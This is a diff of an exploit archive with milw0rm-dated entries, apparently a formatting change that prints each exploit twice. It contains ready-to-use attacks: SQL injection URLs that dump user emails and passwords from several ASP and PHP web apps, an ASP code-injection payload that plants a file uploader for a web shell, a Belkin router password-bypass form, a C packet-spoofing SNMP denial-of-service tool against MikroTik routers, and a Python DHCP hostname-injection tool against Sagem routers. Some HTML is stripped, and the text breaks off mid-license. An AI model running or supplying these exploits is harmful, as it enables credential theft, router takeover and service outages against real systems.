+http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/asp/webapps/1884.htm b/platforms/asp/webapps/1884.htm
index df819487f..33a28c710 100755
--- a/platforms/asp/webapps/1884.htm
+++ b/platforms/asp/webapps/1884.htm
@@ -1,12 +1,12 @@
- -

KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit


change action in source and then submit -
- - -



- -
www.kapda.ir
-
- - -# milw0rm.com [2006-06-06] + +

KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit


change action in source and then submit +
+ + +



+ +
www.kapda.ir
+
+ + +# milw0rm.com [2006-06-06] diff --git a/platforms/asp/webapps/1900.txt b/platforms/asp/webapps/1900.txt index e298df0d3..701e93712 100755 --- a/platforms/asp/webapps/1900.txt +++ b/platforms/asp/webapps/1900.txt @@ -12,5 +12,5 @@ #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20',email,'
','Þifre:%20',sifre,'')+from+uye+ORDER BY email ASC # nukedx.com [2006-06-11]
-
-# milw0rm.com [2006-06-11]
+
+# milw0rm.com [2006-06-11]
diff --git a/platforms/asp/webapps/1930.txt b/platforms/asp/webapps/1930.txt
index 786e89e71..3347e4a1e 100755
--- a/platforms/asp/webapps/1930.txt
+++ b/platforms/asp/webapps/1930.txt
@@ -1,9 +1,9 @@
-# There is Sql injection WeBBoA Host Script v1.1
-# Risk=High
-
-# Exploit:
-http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
-
-# Credit: EntriKa
-
-# milw0rm.com [2006-06-19]
+# There is Sql injection WeBBoA Host Script v1.1
+# Risk=High
+
+# Exploit:
+http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
+
+# Credit: EntriKa
+
+# milw0rm.com [2006-06-19]
diff --git a/platforms/asp/webapps/1931.txt b/platforms/asp/webapps/1931.txt
index 28fe0c5d9..6d61cd377 100755
--- a/platforms/asp/webapps/1931.txt
+++ b/platforms/asp/webapps/1931.txt
@@ -1,51 +1,51 @@ -/*------------------------------------------------ - IHS Public advisory --------------------------------------------------*/ - -ASP Stats Generator SQL-ASP injection - Code Excution -ASP Stats Generator is a powerful website counter, completely written in ASP programming language. -The application is able to track web site activity generating graphical and statistical reports. -It combines a server side class with a javascript system to get a wide range of visitors' details. -http://www.weppos.com - -Credit: -The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) -The original article can be found at: - -http://www.IHSteam.com -http://www.hamid.ir/security/ - - -Vulnerable Systems: -ASP Stats Generator 2.1.1 - 2.1 and below - -SQL injection : - -Example : -The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: -http://localhost/myasg/pages.asp?order='&mese=1 - -Microsoft JET Database Engine error '80040e14' -Syntax error in string in query expression 'SUM(Visits) ''. -/myasg/pages.asp, line 236 - -Exploit : - -http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 - - -ASP Code Injection : -Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". -This can be exploited to inject arbitrary ASP code. - -Exploit : - -#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.
" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.
" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "
" ): f.Write( content ): response.Write( err.Description & "
" ): f.close: end if %><%=filename%>
<%=path%>
<%= Request("path") %>

Upload File

File Name:<%=strAsgMapPathTo%>

<% objFSO = Nothing: on error goto 0: hstr = " -[m.r.roohian] -attacker can upload "cmd.asp" with this uploader and ... - - -Solution: -use ASP Stats Generator v2.1.2 (18/06/2006 ) - -# milw0rm.com [2006-06-19] +/*------------------------------------------------ + IHS Public advisory +-------------------------------------------------*/ + +ASP Stats Generator SQL-ASP injection - Code Excution +ASP Stats Generator is a powerful website counter, completely written in ASP programming language. +The application is able to track web site activity generating graphical and statistical reports. +It combines a server side class with a javascript system to get a wide range of visitors' details. +http://www.weppos.com + +Credit: +The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) +The original article can be found at: + +http://www.IHSteam.com +http://www.hamid.ir/security/ + + +Vulnerable Systems: +ASP Stats Generator 2.1.1 - 2.1 and below + +SQL injection : + +Example : +The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: +http://localhost/myasg/pages.asp?order='&mese=1 + +Microsoft JET Database Engine error '80040e14' +Syntax error in string in query expression 'SUM(Visits) ''. +/myasg/pages.asp, line 236 + +Exploit : + +http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 + + +ASP Code Injection : +Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". +This can be exploited to inject arbitrary ASP code. + +Exploit : + +#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.
" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.
" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "
" ): f.Write( content ): response.Write( err.Description & "
" ): f.close: end if %><%=filename%>
<%=path%>
<%= Request("path") %>
- - - - - - - - - - - - - - -
Remote management:
- - Any IP address can remotely manage the router
- Only this IP address can remotely manage the router
- - . - - . - - . - - - -
remote port: - - - -
NAT Enabling:
- - Enable
- - Disable
-
UPnP
- Enable
- - Disable
-
Auto Update Firmware Enabling
- - Enable
- - disable
- - - -
restore factory defaults (and pw:D)
- - - - - - - - - - -# milw0rm.com [2008-08-25] + + + + +html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem.
+ It worked on model F5D7632-4V6 with upgraded firmware 6.01.08.
+
+ + Change dns nameservers (ip's can't be the same)
+ + + + + + + +
+ + + + +
+ + +
+
+ + Clear log file
+ + +
+
+ + + Change time, pwd(if you have old pwd), remote management, UPnP:)
+ and automatic firmware update (nice combined with DNS poisoning)
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
old password
+ + +
new password, twice
+ + + + +
login timeout (1-99 minutes)
+ + + +
Time and Time Zone:
+ daylight saving :
+ + timezone(number)
+ + + Enable Automatic Time Server Maintenance
+ + + + + + + + + + + + + + + + +
Remote management:
+ + Any IP address can remotely manage the router
+ Only this IP address can remotely manage the router
+ + . + + . + + . + + + +
remote port: + + + +
NAT Enabling:
+ + Enable
+ + Disable
+
UPnP
+ Enable
+ + Disable
+
Auto Update Firmware Enabling
+ + Enable
+ + disable
+ + + +
restore factory defaults (and pw:D)
+ + + + + + + + + + +# milw0rm.com [2008-08-25] diff --git a/platforms/hardware/remote/6366.c b/platforms/hardware/remote/6366.c index b3ebe3e12..1cdd4ce67 100755 --- a/platforms/hardware/remote/6366.c +++ b/platforms/hardware/remote/6366.c 
@@ -1,247 +1,247 @@
-/* --------------------------------------------------------------------------
- * (c) ShadOS 2008
- * _ _ _ _ _ __ _ _ _
- * | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
- * | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
- * |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
- * hellknights.void.ru |___/ .0x48k.
- *
- * --------------------------------------------------------------------------
- *
- * Title: MicroTik RouterOS <=3.13 SNMP write (Set request) PoC exploit.
- *
- * Vendor: www.mikrotik.com
- *
- * Vulnerable versions: 2.9.51 (2.9.x branch), 3.13 (3.x branch)
- * (prior versions also affected).
- *
- * Funded: 03.09.2008 by ShadOS (http://hellknights.void.ru)
- *
- * Let's see the manual:
- * http://www.mikrotik.com/testdocs/ros/2.9/root/snmp_content.php
- *
- *
- * [QUOTE]
- *
- * > SNMP Service
- * >
- * > General Information
- * >
- * > Summary
- * >
- * > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring.
- * >
- * >
- * > The MikroTik RouterOS supports:
- * >
- * > SNMPv1 only
- * > Read-only access is provided to the NMS (network management system)
- * > User defined communities are supported
- * > Get and GetNext actions
- * > No Set support
- * > No Trap support
- * >
- *
- *
- * [/QUOTE]
- *
- *
- * Don't forget to visit our site and my homepage for new releases:
- * http://hellknights.void.ru
- * http://shados.freeweb7.com
- * Also, you can mail me any bugs or suggestions:
- * mailto: shados /at/ mail /dot/ ru
- *
- * Thanks 2 cih.ms and all my friends.
- * --------------------------------------------------------------------------
- *
- * Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; either version 2, or (at your option)
- * any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program; if not, write to the Free Software Foundation,
- * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
- *
- * --------------------------------------------------------------------------
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-
-unsigned char evilcode[49] = {
-0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08,
-0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20,
-0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64,
-0x21
-};
-
-unsigned short in_cksum(addr, len)
-u_short *addr;
-int len;
-{
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1) {
- sum += *w++;
- sum += *w++;
- nleft -= 2;
- }
- if (nleft == 1) {
- *(u_char *) (&answer) = *(u_char *) w;
- sum += answer;
- }
- sum = (sum >> 17) + (sum & 0xffff);
- sum += (sum >> 17);
- answer = -sum;
- return (answer);
-}
-
-int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
-{
- char *packet;
- struct sockaddr_in dstaddr;
- struct iphdr *ip;
- struct udphdr *udp;
- packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len);
- memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
- if (packet == NULL) { printf("Malloc failed\n"); exit(-1); }
- ip = (struct iphdr *)packet;
- udp = (struct udphdr *)(packet+sizeof(struct iphdr));
- ip->saddr = *saddr;
- ip->daddr = *daddr;
- ip->version 
= 4;
- ip->ihl = 5;
- ip->ttl = 255;
- ip->id = htons((unsigned short) rand());
- ip->protocol = IPPROTO_UDP;
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
- ip->check = in_cksum(ip, sizeof(struct iphdr));
- udp->source = htons(sport);
- udp->dest = htons(dport);
- udp->len = htons(sizeof(struct udphdr) + len);
- memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
- dstaddr.sin_family = AF_INET;
- dstaddr.sin_addr.s_addr = *daddr;
- if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
- perror("sendto() failed");
- free(packet);
-}
-
-char * makereq(char *community,int *size)
-{
- char *buf;
- char *ptr;
- int len;
- int i;
-
- len = 7 + strlen(community) + sizeof(evilcode);
- buf = (char *)malloc(len);
- ptr = buf;
-
- *ptr++ = 0x30;
- *ptr++ = len;
-
- /* Snmp Version */
- *ptr++ = 0x02;
- *ptr++ = 0x01;
- *ptr++ = 0x00;
-
- /* Community */
- *ptr++ = 0x04;
- *ptr++ = strlen(community);
- strcpy(ptr,community);
- ptr = ptr + strlen(community);
-
-
- *ptr++ = 0xA3; /* Set Request */
-
- memcpy(ptr, evilcode, sizeof(evilcode));
- ptr = ptr + sizeof(evilcode);
-
- *size = len+1;
-
- return buf;
-}
-
-int erexit(char *msg)
-{
- printf("%s\n",msg);
- exit (-1) ;
-}
-
-int usage()
-{
- printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
-}
-
-int main(int argc, char **argv)
-{
- char *saddr,*daddr,*community;
- unsigned char *buf;
- int size;
- int sock;
- unsigned long lsaddr,ldaddr;
- int i;
-
- saddr = NULL;
- daddr = NULL;
- if (argc != 7) { usage(); erexit("not enough args\n"); }
-
- if (!strcmp(argv[1],"-s"))
- saddr = strdup(argv[2]);
- if (!strcmp(argv[3],"-d"))
- daddr = strdup(argv[4]);
- if (!strcmp(argv[5],"-c"))
- community = strdup(argv[6]);
-
- printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
-
- if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
- erexit("Invalid source/destination IP 
address\n");
-
- if (saddr == NULL) { usage(); erexit("No Source Address"); }
- if (daddr == NULL) { usage(); erexit("No Dest Address"); }
-
- sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
- if (sock == -1)
- erexit("Couldnt open Raw socket!(Are you root?)\n");
-
- lsaddr = inet_addr(saddr);
- ldaddr = inet_addr(daddr);
-
- buf = makereq(community,&size);
-
-
- printf("Sending %d bytes buffer:\n",size);
- for (i=0;i SNMP Service
+ * >
+ * > General Information
+ * >
+ * > Summary
+ * >
+ * > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring.
+ * >
+ * >
+ * > The MikroTik RouterOS supports:
+ * >
+ * > SNMPv1 only
+ * > Read-only access is provided to the NMS (network management system)
+ * > User defined communities are supported
+ * > Get and GetNext actions
+ * > No Set support
+ * > No Trap support
+ * >
+ *
+ *
+ * [/QUOTE]
+ *
+ *
+ * Don't forget to visit our site and my homepage for new releases:
+ * http://hellknights.void.ru
+ * http://shados.freeweb7.com
+ * Also, you can mail me any bugs or suggestions:
+ * mailto: shados /at/ mail /dot/ ru
+ *
+ * Thanks 2 cih.ms and all my friends.
+ * --------------------------------------------------------------------------
+ *
+ * Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation.
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2, or (at your option)
+ * any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software Foundation,
+ * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+ *
+ * --------------------------------------------------------------------------
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+unsigned char evilcode[49] = {
+0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08,
+0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20,
+0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64,
+0x21
+};
+
+unsigned short in_cksum(addr, len)
+u_short *addr;
+int len;
+{
+ register int nleft = len;
+ register u_short *w = addr;
+ register int sum = 0;
+ u_short answer = 0;
+
+ while (nleft > 1) {
+ sum += *w++;
+ sum += *w++;
+ nleft -= 2;
+ }
+ if (nleft == 1) {
+ *(u_char *) (&answer) = *(u_char *) w;
+ sum += answer;
+ }
+ sum = (sum >> 17) + (sum & 0xffff);
+ sum += (sum >> 17);
+ answer = -sum;
+ return (answer);
+}
+
+int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
+{
+ char *packet;
+ struct sockaddr_in dstaddr;
+ struct iphdr *ip;
+ struct udphdr *udp;
+ packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len);
+ memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
+ if (packet == NULL) { printf("Malloc failed\n"); exit(-1); }
+ ip = (struct iphdr *)packet;
+ udp = (struct udphdr *)(packet+sizeof(struct iphdr));
+ ip->saddr = *saddr;
+ ip->daddr = *daddr;
+ ip->version = 4;
+ ip->ihl = 5;
+ ip->ttl = 255;
+ ip->id = htons((unsigned short) rand());
+ ip->protocol = IPPROTO_UDP;
+ ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
+ ip->check = in_cksum(ip, sizeof(struct iphdr));
+ udp->source = 
htons(sport);
+ udp->dest = htons(dport);
+ udp->len = htons(sizeof(struct udphdr) + len);
+ memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
+ dstaddr.sin_family = AF_INET;
+ dstaddr.sin_addr.s_addr = *daddr;
+ if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
+ perror("sendto() failed");
+ free(packet);
+}
+
+char * makereq(char *community,int *size)
+{
+ char *buf;
+ char *ptr;
+ int len;
+ int i;
+
+ len = 7 + strlen(community) + sizeof(evilcode);
+ buf = (char *)malloc(len);
+ ptr = buf;
+
+ *ptr++ = 0x30;
+ *ptr++ = len;
+
+ /* Snmp Version */
+ *ptr++ = 0x02;
+ *ptr++ = 0x01;
+ *ptr++ = 0x00;
+
+ /* Community */
+ *ptr++ = 0x04;
+ *ptr++ = strlen(community);
+ strcpy(ptr,community);
+ ptr = ptr + strlen(community);
+
+
+ *ptr++ = 0xA3; /* Set Request */
+
+ memcpy(ptr, evilcode, sizeof(evilcode));
+ ptr = ptr + sizeof(evilcode);
+
+ *size = len+1;
+
+ return buf;
+}
+
+int erexit(char *msg)
+{
+ printf("%s\n",msg);
+ exit (-1) ;
+}
+
+int usage()
+{
+ printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
+}
+
+int main(int argc, char **argv)
+{
+ char *saddr,*daddr,*community;
+ unsigned char *buf;
+ int size;
+ int sock;
+ unsigned long lsaddr,ldaddr;
+ int i;
+
+ saddr = NULL;
+ daddr = NULL;
+ if (argc != 7) { usage(); erexit("not enough args\n"); }
+
+ if (!strcmp(argv[1],"-s"))
+ saddr = strdup(argv[2]);
+ if (!strcmp(argv[3],"-d"))
+ daddr = strdup(argv[4]);
+ if (!strcmp(argv[5],"-c"))
+ community = strdup(argv[6]);
+
+ printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
+
+ if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
+ erexit("Invalid source/destination IP address\n");
+
+ if (saddr == NULL) { usage(); erexit("No Source Address"); }
+ if (daddr == NULL) { usage(); erexit("No Dest Address"); }
+
+ sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+ if (sock == -1)
+ erexit("Couldnt open Raw socket!(Are you 
root?)\n");
+
+ lsaddr = inet_addr(saddr);
+ ldaddr = inet_addr(daddr);
+
+ buf = makereq(community,&size);
+
+
+ printf("Sending %d bytes buffer:\n",size);
+ for (i=0;i - - - - - - - - -
- - - - - - - - - - -# milw0rm.com [2008-09-17] + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-09-17] diff --git a/platforms/hardware/remote/6477.html b/platforms/hardware/remote/6477.html index 1bd661fb1..281c2e677 100755 --- a/platforms/hardware/remote/6477.html +++ b/platforms/hardware/remote/6477.html @@ -1,26 +1,26 @@ - - - - - - - - - - - - - - - - - - - - - - -# milw0rm.com [2008-09-17] + + + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-09-17] diff --git a/platforms/hardware/remote/6532.py b/platforms/hardware/remote/6532.py index 4fd083074..0b2f6a25a 100755 --- a/platforms/hardware/remote/6532.py +++ b/platforms/hardware/remote/6532.py 
@@ -1,212 +1,212 @@ -#!/usr/bin/env python -# -# -# -# OOO OOO OO OOO -# O O O O O -# O O O O O -# O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO -# O O OO O O O O O OO O O O O O OO O O O -# O O O O O O OOOOOOO O O O O O O OOOOOOO -# O O O O O O O O O O O O O O -# O O O O O O O O O O O O O O O O O -# OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO -# -# -# Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) Remote CSRF Exploit (dhcp hostname attack) -# -# Discovery Date : 13/09/2009 -# Author : Underz0ne Crew -# Zigma -# Author Of The Tool : Rafael Dominguez Vega -# -# First Of all Read this paper : http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf -# -# Description : Using DHCP as a method of attack, arbitrary and malicious scripting can be injected into the DHCP administrative and logs pages (if enabled). When the web administration toold is accessed, the code injection will execute with administrative privileges, which could lead to a complete compromise of the system. -# -# How To Exploit : -# -# Zigma@Underz0ne # python dhcpattack.py -i eth0 -t 192.168.1.1 -p "" -# -# 0y]Z -# -# Starting.... -# . -# Sent 1 packets. -# -# Now When the Admin Enters to "Advanced Status" "DHCP" the CSRF Get's executed and the account get reseted , now u can simply access the web-based Administration Panel with : admin:admin -# So Many Routers Suffers from dhcp hostname attack... -# -# -# -# -# --/*/-----------------------------------------/*-- -# -# This tool is distributed under a BSD licence. A copy of this -# should have been included with this file. -#Copyright (c) 2008, Rafael Dominguez Vega -# -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 
-# * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-# * Neither the name of MWR InfoSecurity nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
-#
-#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
-#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
-#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-#
-#
-#Copyright (c) 2008, Rafael Dominguez Vega.
-#
-# This tool is designed for the purpose of performing security
-# testing only and is not intended to be used for unlawful
-# activities.
-#
-# This tool can be used to check for DHCP script injection vulnerabilities
-# in different sofware products.
-#
-# Required Libraries:
-#scapy.py - "Packet generator/sniffer and network scanner/discovery"
-#http://www.secdev.org/projects/scapy/
-#
-# Help can be viewed by running this file with --help.
-# -# -# Author: Rafael Dominguez Vega -# Version: 0.0.2 -# -# Further information: rafael ({dot}) dominguez-vega <(at)> mwrinfosecurity {(dot)} com -# - -import optparse -from scapy import * -import socket -import fcntl -import struct -import os -import sys -import string -from optparse import OptionParser - -class OptionParser (optparse.OptionParser): - - def check_required (self, opt): - option = self.get_option(opt) - - if getattr(self.values, option.dest) is None: - self.error("%s option not supplied" % option) - -parser = OptionParser() -parser.add_option("-i", "--interface", action="store", dest="hwr",help="Network Interface (required)") -parser.add_option("-t", "--target", action="store", dest="server", help="DHCP Server IP address (required)") -parser.add_option("-p", "--hostname", action="store", dest="payload", help="DHCP Hostname. Between double quotes (\"\") if special characters are used (required)") - -(options, args) = parser.parse_args() - -parser.check_required("-i") -if options.hwr: - hwr = options.hwr -else: - sys.exit(0) - -parser.check_required("-t") -if options.server: - server = options.server -else: - sys.exit(0) - -parser.check_required("-p") -if options.payload: - payload = options.payload -else: - sys.exit(0) - - -#Acknowledgement to Paul Cannon & Frank Millman for the following code chunk - -def get_ip_address(ifname): - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - return socket.inet_ntoa(fcntl.ioctl( - s.fileno(), - 0x8915, - struct.pack('256s', ifname[:15]) - )[20:24]) - -def getMacAddress(): - if sys.platform == 'win32': - for line in os.popen("ipconfig /all"): - if line.lstrip().startswith('Physical Address'): - mac = line.split(':')[1].strip().replace('-',':') - break - else: - for line in os.popen("/sbin/ifconfig"): - if line.find('Ether') > -1: - mac = line.split()[4] - break - return mac - -# end of code chunk - -srcmac = getMacAddress() -ip = get_ip_address(hwr) - - -macad = srcmac.split(":") - -n0 = int(macad[0], 16) 
-n1 = int(macad[1], 16) -n2 = int(macad[2], 16) -n3 = int(macad[3], 16) -n4 = int(macad[4], 16) -n5 = int(macad[5], 16) - -m0 = chr(n0) -m1 = chr(n1) -m2 = chr(n2) -m3 = chr(n3) -m4 = chr(n4) -m5 = chr(n5) - -print(m0) -chmac = (m0+m1+m2+m3+m4+m5) - -q = ip.split(".") - -t0 = int(q[0]) -t1 = int(q[1]) -t2 = int(q[2]) -t3 = int(q[3]) - -r0 = chr(t0) -r1 = chr(t1) -r2 = chr(t2) -r3 = chr(t3) - -hexip = (r0+r1+r2+r3) - -print chmac -print hexip - -print("Starting....") - -ether = Ether(src= srcmac,dst="ff:ff:ff:ff:ff:ff") -ip = IP(src="0.0.0.0",dst="255.255.255.255") -udp = UDP(sport=68,dport=67) -bootp = BOOTP(op="BOOTREQUEST", chaddr= chmac) -dhcp = DHCP(options=[('message-type',3),('hostname', payload),(50, hexip),("server_id", server),('param_req_list','pad'),('end'),('pad')]) - -discover_packet = ether/ip/udp/bootp/dhcp -sendp(discover_packet) - -# milw0rm.com [2008-09-22] +#!/usr/bin/env python +# +# +# +# OOO OOO OO OOO +# O O O O O +# O O O O O +# O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO +# O O OO O O O O O OO O O O O O OO O O O +# O O O O O O OOOOOOO O O O O O O OOOOOOO +# O O O O O O O O O O O O O O +# O O O O O O O O O O O O O O O O O +# OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO +# +# +# Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) Remote CSRF Exploit (dhcp hostname attack) +# +# Discovery Date : 13/09/2009 +# Author : Underz0ne Crew +# Zigma +# Author Of The Tool : Rafael Dominguez Vega +# +# First Of all Read this paper : http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf +# +# Description : Using DHCP as a method of attack, arbitrary and malicious scripting can be injected into the DHCP administrative and logs pages (if enabled). When the web administration toold is accessed, the code injection will execute with administrative privileges, which could lead to a complete compromise of the system. 
+#
+# How To Exploit :
+#
+# Zigma@Underz0ne # python dhcpattack.py -i eth0 -t 192.168.1.1 -p ""
+#
+# 0y]Z
+#
+# Starting....
+# .
+# Sent 1 packets.
+#
+# Now When the Admin Enters to "Advanced Status" "DHCP" the CSRF Get's executed and the account get reseted , now u can simply access the web-based Administration Panel with : admin:admin
+# So Many Routers Suffers from dhcp hostname attack...
+#
+#
+#
+#
+# --/*/-----------------------------------------/*--
+#
+# This tool is distributed under a BSD licence. A copy of this
+# should have been included with this file.
+#Copyright (c) 2008, Rafael Dominguez Vega
+#
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+# * Neither the name of MWR InfoSecurity nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+#
+#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+#A PARTICULAR PURPOSE ARE DISCLAIMED.
